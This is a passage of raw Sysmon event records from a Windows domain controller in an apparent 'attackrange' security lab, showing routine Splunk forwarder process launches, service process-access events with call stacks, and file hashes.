Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002124Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.482{733EE690-3E0E-5F80-5E00-000000007F01}4048C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\WinEventLog.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002123Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.369{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0E-5F80-5D00-000000007F01}3724C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002122Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002121Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002120Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002119Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002118Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002117Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002116Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002115Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002114Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.369{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002113Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.369{733EE690-3DF7-5F80-0500-000000007F01}6442420C:\Windows\system32\csrss.exe{733EE690-3E0E-5F80-5D00-000000007F01}3724C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002112Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.369{733EE690-3E09-5F80-3400-000000007F01}20323896C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{733EE690-3E0E-5F80-5D00-000000007F01}3724C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002111Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.369{733EE690-3E0E-5F80-5D00-000000007F01}3724C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\MonitorNoHandle.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{733EE690-3DF7-5F80-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{733EE690-3E09-5F80-3400-000000007F01}2032C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 22542200x80000000000000002110Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:12.498{733EE690-3E09-5F80-3000-000000007F01}2456WIN-DC-72166190fe80::f993:88b1:f5c9:43f4;::ffff:10.0.1.14;C:\Windows\System32\dfsrs.exe 10341000x80000000000000002109Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.135{733EE690-3E0A-5F80-3D00-000000007F01}39003920C:\Windows\system32\conhost.exe{733EE690-3E0E-5F80-5C00-000000007F01}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002108Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.119{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002107Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.119{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002106Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.119{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002105Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.119{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002104Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.119{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002103Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.119{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002102Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.119{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002101Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.119{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002100Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.119{733EE690-3DF9-5F80-0C00-000000007F01}5881100C:\Windows\system32\svchost.exe{733EE690-3E09-5F80-2E00-000000007F01}2892C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x80000000000000002099Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.119{733EE690-3DF7-5F80-0500-000000007F01}6441144C:\Windows\system32\csrss.exe{733EE690-3E0E-5F80-5C00-000000007F01}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x80000000000000002098Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.119{733EE690-3E0E-5F80-5B00-000000007F01}38083812C:\Windows\system32\cmd.exe{733EE690-3E0E-5F80-5C00-000000007F01}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 154100x80000000000000002097Microsoft-Windows-Sysmon/Operationalwin-dc-7216619.attackrange.local-2020-10-09 10:40:14.133{733EE690-3E0E-5F80-5C00-000000007F01}3780C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal 